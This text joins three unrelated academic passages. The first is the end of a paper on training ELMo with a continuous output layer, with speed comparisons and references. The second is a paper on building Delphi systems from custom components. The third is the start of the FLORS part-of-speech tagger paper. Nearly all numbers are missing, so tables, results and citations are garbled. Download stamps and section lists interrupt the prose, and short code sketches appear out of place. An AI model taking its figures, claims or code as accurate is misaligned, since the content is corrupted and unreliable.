find that the pre-trained input word embedding is still indispensable because using a randomly initialized input embedding would lead to brittle performance (e.g., . on snli). pre-trained cnn layer as word embedding in section , we observed that models using fast- text embedding (elmo-c and elmo-a) as input performed worse than elmo on srl, a task relying heavily on syntactic information. 
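For concreteness, a sketch of what this ablation (ELMo-CRND, described just below) amounts to, with illustrative sizes:

```python
import torch

V, m = 50_000, 300                      # illustrative sizes
W_rnd = torch.randn(V, m)               # every entry drawn from a standard normal distribution
W_rnd.requires_grad_(False)             # kept fixed during training, just like the pre-trained embedding

# training is unchanged otherwise: the encoder output c is pulled toward W_rnd[target_id]
# instead of toward the fastText vector of the target word
```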
we suspect that the fasttext embedding is weaker on capturing syntactic information than the character-cnn trained in elmo (peters et al., b). to verify this, we train elmo-c using the trained cnn layer from elmo as the input layer (elmo-ccnn-cc) or the output embedding (elmo-ccc-cnn). we observe that the two models exhibit notably better performance on srl (see table ). we also consider a elmo-ccnn model, which uses the cnn layer as both the input and output embedding. on srl, elmo-ccnn per- forms favorably compared to elmo-c but slightly worse than elmo-ccnn-cc or elmo-ccc-cnn. we suspect that this is because elmo-ccnn-cc and elmo-ccc-cnn benefit from different kinds of embeddings in the input layer and the output layer. . computational efficiency next, we study the computational efficiency of the continuous output layer against several baselines from two aspects. first, in section . , we dis- cussed three factors governing the overall training time of the model: ) arithmetic complexity, ) gpu memory consumption, and ) communica- tion cost. we aim to study how each factor affects the overall training time of each model. second, in the above experiments, we focus on elmo with the lstm as the sequence encoder. we wonder whether the continuous output layer can deliver attractive speedup for sequence encoders of different types and sizes. we investigate the continuous output layer (cont) and three common baseline output layers: ) the subword-level language model (subword), ) the adaptive softmax layer (adaptive), and ) the sampled softmax layer (sampled). addition- ally, we include a variant of the sampled softmax denoted as fixed where the output word embed- ding is initialized by the fasttext embedding and fixed during the training. this output layer is similar to a special case of cont with a ranking loss, where the model encourages its output to be close to the target word embedding but far from a negative sample. in total, we study five different output layers. for several output layers, the trade-off between computational efficiency and model performance is controlled by their hyper-parameters. we choose hyper-parameters close to those reported in the literature to strike a balance between speed and performance. . . speedup breakdown we pair the five different output layers with the same input layer (fixed word embedding) and sequence encoder (elmo’s lstm with projec- tion). we then test the training speed of these models under three scenarios, which are designed to reflect the individual effect of the arithmetic complexity, the gpu memory consumption, and the communication cost: • s (small batch): we use one gpu card and set the batch size to be . the asynchronous execution feature of the gpu is disabled. the time needed to finish one batch is reported. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april vocab params batch s (small batch) s (large batch) s (multiple gpus) cont ∞ m . s . s . s fixed ∞ m . x . x . x subword ∞ m . x . x . x adaptive k m . x . x . x k m . x . x . x k m . x . x . x sampled k m . x . x . x k m . x . x . x k m . x . x . x table : statistics on the computation efficiency of different models. for cont, we report the actual training time in seconds. for other models, we report the relative training time compared to cont. params: number of trainable parameters of the whole model in millions. batch: maximal batch size per card. • s (large batch): we use one gpu card and the maximal batch size. 
the time needed to finish training on one million words for each model is reported. • s (multiple gpus): we use gpu cards and the maximal batch size. the time needed to finish training on one million words for each model is reported. in table , we report the training speed of the models under each scenario. in addition, we report the parameter size and the maximal batch size on one gpu card. for adaptive and sampled, the vocabulary size also affects the training speed so we test them under three different vocabulary sizes: k, k, and , k. arithmetic complexity the arithmetic com- plexity of the models is reflected by the speed under s , where the gpu memory is always abundant and the arithmetic complexity is the dominating factor. cont holds a mild advan- tage ( . x- . x) over baseline models, which is expected because the lstm layers in elmo cont under s is slightly slower than the elmo-c model reported in section . . this is because when training the elmo-c model reported in . , we actually train a forward elmo-c on two cards and train a backward elmo-c on two other cards, which reduces the communication cost by half. this optimization is only applicable to our approach in the setting of elmo and does not work for other baseline methods. in this experiment, we disable this optimization for generosity. the , k vocabulary is created on the tokenized - billion-word common crawl corpus (panchenko et al., ), which covers words that appear more than times. are quite slow and that undermines the advantage of the continuous output layer. for elmo-sub, the small yet non-negligible softmax layer adds overhead to the arithmetic complexity. fixed, adaptive, and sampled have similar arithmetic complexity but adaptive has the highest com- plexity when the vocabulary size is large (e.g., , k). gpu memory consumption the effect of gpu memory consumption can be observed by comparing the statistics under s and s . the difference between s and s is that the parallel computing of the gpu is fully utilized. for cont, its great gpu memory efficiency helps it gain larger speedup under s , especially against common baselines such as subword, adaptive, and sampled. for elmo-sub, in addition to the overhead from the softmax layer, breaking words into subwords leads to longer sequences, which increases the training time by . x. thus it is . x slower than cont under s . sampled suffers from its huge parameter size and exhibits poor scalability with respect to the vocabulary size ( . x slower when the vocabulary size reaches , k). communication cost the effect of the com- munication cost across gpus can be observed by comparing the statistics under s and s . as the communication cost and gpu memory consumption both are highly dependent on the parameter size, the observations are similar. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april lstm lstmx trans base elmo trans large gpt cont . s . s . s . s . s . s fixed . x . x . x . x . x . x subword . x . x . x . x . x . x adaptive . x . x . x . x . x . x sampled . x . x . x . x oom . x table : time needed to finish training on one million words for each model using gpu cards and the maximal batch size. for cont, we report the actual training time in seconds. for other models, we report the relative training time compared to cont. oom means that the gpu memory is not sufficient. cont shows substantial speedup over common baselines under all scenarios. . . 
the continuous output layer with different sequence encoders for this experiment, we pair the output layers with different sequence encoders and investigate their training time. we start from a single-layer lstm with a hidden size of (lstm) and a two-layer version (lstmx ), both reported in grave et al. ( ). they are all smaller than the sequence encoder used in elmo. we then scale up to the forward and backward transformer reported in peters et al. ( b) (trans base) and the multi-layer lstm with projection in elmo(elmo). finally, we test two larger trans- former, trans large, a scaled-up version of trans base, and a uni-directional transformer (denoted as gpt) with the same size as bertbase (devlin et al., ) and gpt (radford et al., ), respectively. for all models but gpt, the lengths of the input sequences are fixed at . for gpt, we use input sequences of length , following its original setting. for adaptive and sampled, we fix the vocabulary size at k. we report the training time of each model using four gpu cards and the maximal batch size (s ) in table . we find that the continuous output layer remains attractive, even when the sequence encoder is as large as gpt. in that case, the speedup of cont over subword, adaptive, and sampled is still substantial ( . x - . x). in addition, we observe that for sequence encoders of the same type, more complex they get, less speedup cont enjoys, which is expected. for instance, from lstm to lstmx , the speedup of cont decreases noticeably. however, the speedup the continuous output brings also depends on the architecture of the sequence encoder. for instance, though trans base and trans large are more complex than lstmx , cont enjoys larger speedup with those transformers. profiling the training process of sequence decoders such as lstm and the transformer on gpu devices is an interesting research topic but out of the scope of this study. conclusion we introduced an efficient framework to learn contextual representation without the softmax layer. the experiments with elmo showed that we significantly accelerate the training of the current models while maintaining competitive performance on various downstream tasks. acknowledgments we wish to thank the anonymous reviewers, the editor, mark yatskar, muhao chen, xianda zhou, and members at uclanlp lab for helpful comments. we also thank yulia tsvetkov and sachin kumar for help with implementing the continuous output layer as well as jieyu zhao, kenton lee, and nelson liu for providing re- producible source code for experiments. this work was supported by national science foundation grant iis- and iis- . references jimmy lei ba, jamie ryan kiros, and geoffrey e hinton. . layer normalization. arxiv preprint arxiv: . . yoshua bengio and jean-sébastien senécal. . quick training of probabilistic neural nets by importance sampling. in aistats. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural language inference. in emnlp. james bradbury, stephen merity, caiming xiong, and richard socher. . quasi-recurrent neu- ral networks. arxiv preprint arxiv: . . ciprian chelba, tomas mikolov, mike schuster, qi ge, thorsten brants, phillipp koehn, and tony robinson. . one billion word bench- mark for measuring progress in statistical lan- guage modeling. arxiv preprint arxiv: . . 
mia xu chen, orhan firat, ankur bapna, melvin johnson, wolfgang macherey, george foster, llion jones, mike schuster, noam shazeer, niki parmar, ashish vaswani, jakob uszkoreit, lukasz kaiser, zhifeng chen, yonghui wu, and macduff hughes. . the best of both worlds: combining recent advances in neural machine translation. in acl. qian chen, xiaodan zhu, zhen-hua ling, si wei, hui jiang, and diana inkpen. . enhanced lstm for natural language inference. in acl. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel p. kuksa. . natural language processing (almost) from scratch. journal of machine learn- ing research, : – . yann n. dauphin, angela fan, michael auli, and david grangier. . language modeling with gated convolutional networks. in icml. jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre-training of deep bidirectional transformers for language understanding. in naacl-nlt . john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, : – . matt gardner, joel grus, mark neumann, oyvind tafjord, pradeep dasigi, nelson f. liu, matthew e. peters, michael schmitz, and luke zettlemoyer. . allennlp: a deep semantic natural language processing platform. arxiv preprint arxiv: . . priya goyal, piotr dollár, ross girshick, pieter noordhuis, lukasz wesolowski, aapo kyrola, andrew tulloch, yangqing jia, and kaiming he. . accurate, large minibatch sgd: training imagenet in hour. arxiv preprint arxiv: . . edouard grave, armand joulin, moustapha cissé, david grangier, and hervé jégou. . effi- cient softmax approximation for gpus. arxiv preprint arxiv: . . luheng he, kenton lee, mike lewis, and luke zettlemoyer. . deep semantic role label- ing: what works and what’s next. in acl. shexia he, zuchao li, hai zhao, and hongxiao bai. . syntax for semantic role labeling, to be, or not to be. in acl. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, : – . yacine jernite, samuel r bowman, and david sontag. . discourse-based objectives for fast unsupervised sentence representation learn- ing. arxiv preprint arxiv: . . ian jolliffe. . principal component analysis. in international encyclopedia of statistical science, springer berlin heidelberg. rafal jozefowicz, oriol vinyals, mike schuster, noam shazeer, and yonghui wu. . explor- ing the limits of language modeling. arxiv pre- print arxiv: . . yoon kim, yacine jernite, david sontag, and alexander m. rush. . character-aware neural language models. in aaai. ryan kiros, yukun zhu, ruslan r. salakhutdinov, richard zemel, raquel urtasun, antonio torralba, and sanja fidler. . skip-thought vectors. in nips. nikita kitaev and dan klein. . multilingual constituency parsing with self-attention and pre-training. arxiv preprint arxiv: . . sachin kumar and yulia tsvetkov. . von mises-fisher loss for training sequence to sequence models with continuous outputs. in iclr. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april kenton lee, luheng he, mike lewis, and luke zettlemoyer. . end-to-end neural coref- erence resolution. in emnlp. kenton lee, luheng he, and luke zettlemoyer. . higher-order coreference resolution with coarse-to-fine inference. in naacl-hlt . tao lei, yu zhang, sida i. wang, hui dai, and yoav artzi. . simple recurrent units for highly parallelizable recurrence. in emnlp. omer levy and yoav goldberg. . 
neural word embedding as implicit matrix factorization. in nips. lajanugen logeswaran and honglak lee. . an efficient framework for learning sentence representations. iclr. bryan mccann, james bradbury, caiming xiong, and richard socher. . learned in translation: contextualized word vectors. in nips. stephen merity, nitish shirish keskar, and richard socher. . an analysis of neural language modeling at multiple scales. arxiv preprint arxiv: . . tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word representations in vector space. arxiv preprint arxiv: . . tomas mikolov, edouard grave, piotr bojanowski, christian puhrsch, and armand joulin. . advances in pre-training distributed word rep- resentations. arxiv preprint arxiv: . . a mnih and yw teh. . a fast and simple algorithm for training neural probabilistic language models. in icml. frederic morin and yoshua bengio. . hier- archical probabilistic neural network language model. in aistats. alexander panchenko, eugen ruppert, stefano faralli, simone paolo ponzetto, and chris biemann. . building a web-scale dependency- parsed corpus from commoncrawl. arxiv preprint arxiv: . . matthew e. peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, and luke zettlemoyer. a. deep contex- tualized word representations. in naacl-hlt . matthew e. peters, mark neumann, luke zettlemoyer, and wen-tau yih. b. dissect- ing contextual word embeddings: architecture and representation. in emnlp. yuval pinter, robert guthrie, and jacob eisenstein. . mimicking word embeddings using sub- word rnns. in emnlp. sameer pradhan, alessandro moschitti, nianwen xue, hwee tou ng, anders björkelund, olga uryupina, yuchen zhang, and zhi zhong. . towards robust linguistic analysis using ontonotes. in conll. sameer pradhan, alessandro moschitti, nianwen xue, olga uryupina, and yuchen zhang. . conll- shared task: modeling multi- lingual unrestricted coreference in ontonotes. in joint conference on emnlp and conll- shared task. alec radford, karthik narasimhan, tim salimans, and ilya sutskever. . improving language understanding by generative pre-training. openai blog. alec radford, jeffrey wu, rewon child, david luan, dario amodei, and ilya sutskever. . language models are unsupervised multitask learners. openai blog. pranav rajpurkar, jian zhang, konstantin lopyrev, and percy liang. . squad: , + questions for machine comprehension of text. in emnlp. erik f sang and fien de meulder. . introduc- tion to the conll- shared task: language- independent named entity recognition. arxiv preprint cs/ . rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. in acl. richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew y. ng, and christopher potts. . recursive deep models for semantic compositionality over a sentiment treebank. in emnlp. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april emma strubell, ananya ganesh, and andrew mccallum. . energy and policy consid- erations for deep learning in nlp. arxiv preprint arxiv: . . shuai tang, hailin jin, chen fang, zhaowen wang, and virginia de sa. . speeding up context- based sentence representation learning with non-autoregressive convolutional decoding. in workshop on representation learning for nlp. ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n. gomez, lukasz kaiser, and illia polosukhin. . 
attention is all you need. in nips. yonghui wu, mike schuster, zhifeng chen, quoc v. le, mohammad norouzi, wolfgang macherey, maxim krikun, yuan cao, qin gao, klaus macherey, jeff klingner, apurva shah, melvin johnson, xiaobing liu, lukasz kaiser, stephan gouws, yoshikiyo kato, taku kudo, hideto kazawa, keith stevens, george kurian, nishant patil, wei wang, cliff young, jason smith, jason riesa, alex rudnick, oriol vinyals, gregory s. corrado, macduff hughes, and james a. dean. . google’s neural machine translation system: bridging the gap between human and machine translation. arxiv preprint arxiv: . . zhilin yang, zihang dai, ruslan salakhutdinov, and william w. cohen. . breaking the soft- max bottleneck: a high-rank rnn language model. arxiv preprint arxiv: . . yang you, zhao zhang, cho-jui hsieh, james demmel, and kurt keutzer. . imagenet training in minutes. in proceedings of the th international conference on parallel process- ing, icpp . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction background and related work approach computational efficiency learning with continue outputs overall training time open-vocabulary training interpretation of learning contextual encoders with continuous outputs experiment setup main results analysis effect of the pre-trained embedding computational efficiency speedup breakdown the continuous output layer with different sequence encoders conclusion paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) research on method of rapid software development based on component design hu jingyi school of computer science and engineering xi’an technological university xi'an, , china e-mail: @qq.com lei juchao school of computer science and engineering xi’an technological university xi'an, , china wang yaming school of computer science and engineering xi’an technological university xi'an, , china e-mail: @qq.com zhao yalin school of computer science and engineering xi’an technological university xi'an, , china e-mail: zhaoyalin @qq.com abstract—this this article presents a quick way to develop your system with custom components in delphi. use the above method can minimize code duplication, improve work efficiency. in this paper, we apply this method to the development of information management system in a university based on the data snap three-tier architecture. through practice, we find that the workload of the original three months, and we only need days to complete. therefore, adopting the rapid software development method based on component design proposed in this paper can not only shorten the programming time of management systems such as erp and information management by more than two thirds, but also bring great advantages in system development. keywords-delphi; custom components; erp; efficiency; time i. introduction with the advent of the information age, we are more and more inseparable from technology. now developed a lot of pc software such as information management systems that can help people save a lot of manpower, material resources. especially every year at the end of annual work statistics, the design of a set of software through the relevant settings for automatic statistical calculation, approval, access and other functions is necessary. 
the completion of the software can be fully realized at any time computer statistics automatically calculate the workload of a variety of teaching and research, but also can effectively avoid errors in the calculation process. there are a lot of software that uses a lot of languages to develop the pc end now, but to the visual software development, this text uses delphi to finish. and delphi is a powerful, windows-based environment, object-oriented visual application development tool. it combines the power of the traditional programming language object pascal with the database language for both traditional arithmetic programming and database programming. the data snap technology system in delphi provides a mechanism for transferring database information between the client and the application server. meanwhile, the rich component library brings great convenience to the program design. delphi has become one of the most popular visual software development tools today. when we used delphi to develop pc software, we developed a way to customize the components to complete the software development and make the program completed in three months and we only need days to complete. ii. theoretical basis a. practicality of custom components in a system development, design a custom component. in the process of system development can be based on the analysis of needs sorted out the same part of the logic function, the use of custom components to complete the corresponding function. therefore, anytime, anywhere custom components into different needs of the interface according to the corresponding function, reduce code duplication and greatly facilitate the development of programming speed. in an erp system to do needs analysis, we will find a lot of repetitive logic requirements, for example: doing computer college information management system, whether it is to deal with college business or teachers related to the operation, there are for the basic data to add, modify, delete and so on. that by designing custom components: add button to complete the corresponding function, into the page you need to complete its specific functions and greatly reduce the programmer's efficiency. b. inheritance of custom components delphi component is an object library, but also a class. the base class for all objects in delphi is tobject, and the most primitive base class for a component is tobject, as shown in figure . international conference on sensor network and computer engineering (icsnce ) tobject exception tinterfacedobject tstream tpersistent tcomobject tgraphicobjtce tgraphic tcomponent tcollection tstrings tapplication tdataset tmenu tcontrol tcommondialog tfield figure . example of a one-column figure caption. the hierarchy of components in this structure is: tobject ----> tpersistent -----> tcomponent -----> tcontrol. tcomponent, the base class for all delphi components, inherits from this class for all object libraries that you want to register directly with the ide for visualization. tcomponent provides the necessary information to make the component work on delphi's ide. then tcomponent derives the tcontrol class, which is the base class for all flagship visual controls. all of our components are based on tcomponent. iii. experiment and test a. 
the basis for custom component development in the development of custom components we need to analyze a page needs and then do some work:  data acquistion: in general, we are all custom components that design functionality, and we need to get the data or output the data. in each page there will be a lot of data-type components, how do we find the corresponding data components, you can design components by the naming rules to find the corresponding data-type components. for example: set the settings in the component, to the components of a unified naming rules such as: cktext _xxxx,xxxx for the database table field names, according to cktext can find the components needed, according to the xxxx components and database fields correspond.  data transfer: passing data using json. json is a lightweight data exchange format based on a subset of ecmascript that stores and represents data in a completely independent of the programming language. there are only two structures in json: objects and arrays json values consist of numbers, strings, logical values, arrays, objects, null, and so on. using json as a data exchange format between the client and the server, the json data format can be used directly by the server, greatly simplifying the code development of the client and server, and easier to maintain. and the data format is relatively simple, easy to read and write, the format is compressed, occupy a small bandwidth.  mutual exclusion between functional components: when the button on click is executed, in order to avoid data confusion, you must make the button is not related to the button is invalid. for example, when you click the add button in the information management system, the buttons, such as modify, delete, archive, data export, return, etc., must be inactive. the save and cancel buttons must be valid. when the save or cancel button is clicked, buttons such as add, edit, archive and return should be valid, while save and cancel buttons should be inactive. therefore, the entire information management system interface point of view, in addition to archiving, data printing, return no mutual exclusion, the other buttons need to be mutually exclusive with other buttons. b. associations between components in the page there are many custom components in a page, but we need to know the current step to the program flow, the current table, the current operator, the current name from the table, and others. then we need to design a custom template components on each page, template components design attributes as shown in table : table i. template attributes template attributes explanation template attributes explanation mb_lcmc process name mb_prior_step step number mb_now_step the current step number mb_next_step next step number mb_tablename the current table name mb_prior_tablena me pre-step name mb_lb_field category field mb_lb_name category name mb_cb_tablena me from the table name mb_next_tablenam e next table name mb_next_table nameb next table name mb_next_lczttable name next process status table name mb_next_lbna me next category mb_next_lbfield next category field mb_yzd data upload original field mb_mbzd data download target field mb_czr operator mb_cjyh root name template name tag mark field mb_lc_yesno is it a process? others as spare fields c. implementation of custom component development after the preparation of the above two parts, the process of custom components in delphi contains the following steps:  create a library unit that contains new parts. 
 member has inherited a new type of component type.  add properties, methods and events.  register parts with delphi.  create help files for the component's properties methods and events. custom components such as adding components the main code is as follows: uses system. sysutils, system. classes, vcl. controls, vcl. stdctrls, vcl. buttons, vcl. comctrls , dbgrideh, math, datasnap. dbclient, mysave, iniboxes, mygd wgd, myinidb combobox, mb, myini international conference on sensor network and computer engineering (icsnce ) combobox, vcl. graphics ;// the required unit file for creating the component. registercomponents('d ', [tmyadd]); constructor tmyadd.create(aowner:tcomponent); inherited; self.onclick:=myadd; nowday:=formatdatetime('yyyymmddhhnnss',now()); czsj:=nowday; ss :=inttostr(i); lcbh:=czsj+ss ; (self.owner.findcomponent('mb ') as tmb).mb_lcbh:=lcbh; lcmc:=(self.owner.findcomponent('mb ') as tmb).mb_lcmc; czr:=(self.owner.findcomponent('mb ') as tmb).mb_czr; //obtain name and operator letter via template component k:= owner.componentcount; //get the number of components on the form for j := to k - do begin namey:=owner.components[j].classname; if(namey='tmyedit')then(self.owner.components[j] as tbitbtn).enabled:=false//button exclusive event else if(namey='tmysave')thenif(namey='tmysave')then begin (self.owner.components[j] as tbitbtn).enabled:=true ; (self.owner.components[j] as tmysave).isadd:=true; end //other mutually exclusive operation (self.owner.findcomponent('maindbgrid') as tdbgrideh).enabled:=false; main_dataset:= (self.owner.findcomponent('main_set') as tclientdataset); main_dataset.append;//find the form on the main interface with the data after the query, and add records main_dataset.findfield('lcbh').asstring:=lcbh; //new process id main_dataset.findfield('czr').asstring:=czr; main_dataset.findfield('czsj').asstring:=czsj; main_dataset.findfield('lcjdmc').asstring:=lcjdmc; iv. test this experiment is in the computer system of information management system for experiments, the test results are as follows: custom component testing: a custom component of this article appears in the delphi visualization toolbox: figure figure . custom component renderings  in the page, drag the custom components to complete the corresponding function: figure figure . system in a page renderings v. conclusion according to the method of using custom component design in software development, the following advantages and limitations are obtained:  using the custom component technology, the management system model was initially realized, the idea of software reuse was realized, the phenomenon of repeated encoding was reduced, and the software development efficiency, maintainability and scalability were improved.  the use of custom components in the information management system and the related operation of each page through the related parameter settings are feasible and safe.  for the development of a set of software, through the development of custom components greatly reduce the development cycle, a great use of value to the actual development of software. international conference on sensor network and computer engineering (icsnce )  this method of custom components in the development of software generally for the role of ert system, for some web version of the software is not very effective. acknowledgment thanks to teacher lei hard guidance, thanks to brothers and sisters, brothers and boys to provide help. 
thanks to the expert group for their corrections, and thanks to everyone who helped me.

flors: fast and simple domain adaptation for part-of-speech tagging

tobias schnabel, department of computer science, cornell university, tbs @cornell.edu
hinrich schütze, center for information & language processing, university of munich, inquiries@cislmu.org

abstract

we present flors, a new part-of-speech tagger for domain adaptation. flors uses robust representations that work especially well for unknown words and for known words with unseen tags. flors is simpler and faster than previous domain adaptation methods, yet it has significantly better accuracy than several baselines.

introduction

in this paper we describe flors, a part-of-speech (pos) tagger that is fast in training and tagging, uses local context only (as opposed to finding the optimal tag sequence for the entire sentence), performs robustly on target domains (tds) in unsupervised domain adaptation (da) and is simple in architecture and feature representation.

flors constructs a robust representation of the local context of the word v that is to be tagged. this representation consists of distributional features, suffixes and word shapes of v and its local neighbors. we show that it has two advantages. first, since the main predictors used by flors are distributional features (not the word’s identity), flors predicts unseen tags of known words better than prior work on da for pos. second, since flors uses representations computed from unlabeled text, representations of unknown words are in principle of the same type as representations of known words; this property of flors results in better performance on unknown words compared to prior work. these two advantages are especially beneficial for tds that contain high rates of unseen tags of known words and high rates of unknown words.

we show that flors achieves excellent da tagging results on the five domains of the sancl shared task (petrov and mcdonald, ) and outperforms three state-of-the-art taggers on blitzer et al.’s ( ) biomedical data. flors is also simpler and faster than other pos da methods.
it is simple in that the input representation consists of three simple types of features: distributional count features and two types of binary features, suffix and shape features. many other word representations that are used for improving generalization (e.g., (brown et al., ; collobert et al., )) are costly to train or have difficulty handling unknown words. our representations are fast to build and can be created on-the-fly for unknown words that occur during testing.

the learning architecture is simple and fast as well. we train k binary one-vs-all classifiers that use local context only and no sequence information (where k is the number of tags). thus, tagging complexity is o(k). many other learning setups for da are more complex; e.g., they learn representations (as opposed to just counting), they learn several classifiers for different subclasses of words (e.g., known vs. unknown) or they combine left-to-right and right-to-left taggings.

the next two sections describe experimental data, setup and results. results are discussed in section . we compare flors to alternative word representations in section and to related work in section . section presents our conclusions.

experimental data and setup

data. our source domain is the penn treebank (marcus et al., ) of wall street journal (wsj) text. following blitzer et al. ( ), we use sections - for training and , wsj sentences from as unlabeled data in training. we evaluate on six different tds. the first five tds (newsgroups, weblogs, reviews, answers, emails) are from the sancl shared task (petrov and mcdonald, ). additionally, the sancl dataset contains sections and of the wsj for in-domain development and testing, respectively. each sancl td has an unlabeled training set of , sentences and development and test sets of about labeled sentences each. the sixth td is bio, the penn biotreebank data set distributed by blitzer. it consists of dev and test sets of sentences each and , unlabeled sentences.

classification setup. similar to svmtool (giménez and màrquez, ) and choi and palmer ( ) (henceforth: c&p), we use local context only for tagging instead of performing sequence classification. for a word w occurring as token vi in a sentence, we build a feature vector for a local window of size 2l + 1 around vi. the representation of the object to be classified is this feature vector and the target class is the pos tag of vi. we use the linear l -regularized l -loss svm implementation provided by liblinear (fan et al., ) to train k one-vs-all classifiers on the training set, where k is the number of pos tags in the training set (in our case k = ). we train with untuned default parameters; in particular, c = . in the special case of linear svms, the value of c does not need to be tuned exhaustively as the solution remains constant after c has reached a certain threshold value c∗ (keerthi and lin, ). training can easily be parallelized by giving each binary svm its own thread.

windows. the local context for tagging token vi is a window of size 2l + 1 centered around vi: (vi−l, . . . , vi, . . . , vi+l). we pad sentences on either side with 〈boundary〉 to ensure sufficient context for all words.
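as a rough illustration of this padding and windowing step (a minimal sketch with placeholder names, not the original implementation), the local window around a token can be assembled as follows; the per-word mapping wordfeatures stands in for the distributional, suffix and shape features that are defined next.

import java.util.*;

// sketch: build the padded window of size 2l+1 around token i and concatenate
// the per-word feature vectors; wordFeatures is a placeholder for the mapping f
// (distributional, suffix and shape features) described in the next paragraphs.
class WindowSketch {
    static final String BOUNDARY = "<BOUNDARY>";

    static double[] windowRepresentation(List<String> sentence, int i, int l,
                                         Map<String, double[]> wordFeatures, int dim) {
        double[] rep = new double[(2 * l + 1) * dim];
        for (int k = -l; k <= l; k++) {
            int pos = i + k;
            // positions outside the sentence are treated as boundary tokens
            String token = (pos < 0 || pos >= sentence.size()) ? BOUNDARY : sentence.get(pos);
            double[] f = wordFeatures.getOrDefault(token, new double[dim]);
            System.arraycopy(f, 0, rep, (k + l) * dim, dim);
        }
        // this concatenated vector is scored by the k one-vs-all linear classifiers;
        // the predicted tag is the class with the largest score
        return rep;
    }
}

in the actual system the per-word vectors are sparse; the dense array above is used only for readability.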
given a mapping f from words to feature vectors (see below), the representation f of a token vi is the concatenation of the l + word vectors in its window f(vi) = f(vi−l)⊕ . . .⊕f(vi+l) where ⊕ is vector concatenation. word features. we represent each word w by four components: (i) counts of left neighbors, (ii) counts of right neighbors, (iii) binary suffix features and (iv) binary shape features. these four compo- nents are concatenated: f(w) = f left(w)⊕f right(w)⊕f suffix(w)⊕f shape(w) we consider these sources of information equally important and normalize each of the four compo- nent vectors to unit length. normalization also has a beneficial effect on svm training time because it alleviates numerical problems (fan et al., ). distributional features. we follow a long tra- dition of older (finch and chater, ; schütze, ; schütze, ) and newer (huang and yates, ) work on creating distributional features for pos tagging based on local left and right neighbors. specifically, the ith entry xi of f left(w) is the weighted number of times that the indicator word ci occurs immediately to the left of w: xi = tf (freq (bigram(ci, w))) where ci is the word with frequency rank i in the cor- pus, freq (bigram(ci, w)) is the number of times the bigram “ci w” occurs in the corpus and we weight the non-zero frequencies logarithmically: tf(x) = + log(x). tf-weighting has been used by other re- searchers (huang and yates, ) and showed good performance in our own previous work. f right(w) is defined analogously. we restrict the set of indicator words to the n = most fre- quent words in the corpus. to avoid zero vectors, we add an entry xn+ to each vector that counts omitted contexts: xn+ = tf   ∑ j:j>n freq (bigram(cj, w))   we compute distributional vectors on the joint corpus dall of all labeled and unlabeled text of source domain and td. the text is preprocessed by lowercasing everything – which is often done when computing word representations, e.g., by turian et al. ( ) – and by padding sentences with 〈boundary〉 tokens. suffix features. suffixes are promising for da because basic morphology rules are the same in dif- ferent domains. in contrast to other work on tagging model classifier features tnt hmm p−{ , , }, v , suffixes (for oovs) stanford bidir. memm p±{ , , }, v±{ , }, affixes, orthography svmtool svm p±{ , , , }, v±{ , , , }, affixes, orthography, word length c&p svm p±{ , , , }, v±{ , , , }, affixes, orthography flors svm distributions of v±{ , , }, suffixes, orthography table : overview of baseline taggers and flors. vi: token, pi: pos tag. positions included in the sets of token indices are relative to the position i of the word v to be tagged; e.g., p±{ , , } is short for {p− , p− , p− , p , p , p }. to represent tokens vi, models – use vocabulary indices and flors uses distributional representations. models – use combinations of features (e.g., tag-word) as well. (e.g., ratnaparkhi ( ), toutanova et al. ( ), miller et al. ( )) we simply use all (lowercase) suffixes to avoid the need for selecting a subset of suffixes; and we treat all words equally as opposed to using suffix features for only a subset of words. for suffix s, we set the dimension corresponding to s in f suffix(w) to if lowercased w ends in s and to otherwise. note that w is a suffix of itself. shape features. we use the berkeley parser word signatures (petrov and klein, ). 
each word is mapped to a bit string encompassing binary indicators that correspond to different orthographic (e.g., does the word contain a digit, hyphen, upper- case character) and morphological (e.g., does the word end in -ed or -ing) features. there are unique signatures in wsj. we set the dimension of f shape(w) that corresponds to the signature of w to and all other dimensions to . we note that the shape features we use were designed for english and prob- ably would have to be adjusted for other languages. baselines. we address the problem of unsuper- vised domain adaptation for pos tagging. for this problem, we consider three types of baselines: (i) high-performing publicly available systems, (ii) the taggers used at sancl and (iii) pos da results published for bio. most of our experiments use taggers from cate- gory (i) because we can ensure that experimental conditions are directly comparable. the four base- lines in category (i) are shown in table . three have near state-of-the-art performance on wsj: svmtool (giménez and màrquez, ), stanford one could also compute these suffixes for _w (w prefixed by underscore) instead of for w to include words as distinguish- able special suffixes. we test this alternative in table , line . (toutanova et al., ) (a birectional memm) and c&p. tnt (brants, ) is included as a represen- tative of fast and simple hmm taggers. in addition, c&p is a tagger that has been extensively tested in da scenarios with excellent results. unless other- wise stated, we train all models using their default configuration files. we use the optimized parameter configuration published by c&p for the c&p model. test set results will be compared with the sancl taggers (category (ii)) at the end of section . as far as category (iii) is concerned, most work on pos da has been evaluated on bio. we discuss our concerns about the bio evaluation sets in sec- tion , but also show that flors beats previously published results on bio as well (see table ). experimental results we train k binary svm classifiers on the training set. a token in the test set is classified by building its feature vector, running the classifiers on it and then assigning it to the pos class whose one-vs-all liblinear classifier returns the largest score. results for all accuracy (accuracy for all to- kens) and oov accuracy (accuracy for tokens not occurring in the labeled wsj data) are reported in table . results with an asterisk are significantly worse than a column’s best result using mcnemar’s test (p < . ). we use the same test and p-value throughout this paper. the basic flors model (table , line ) uses window size (l = ). 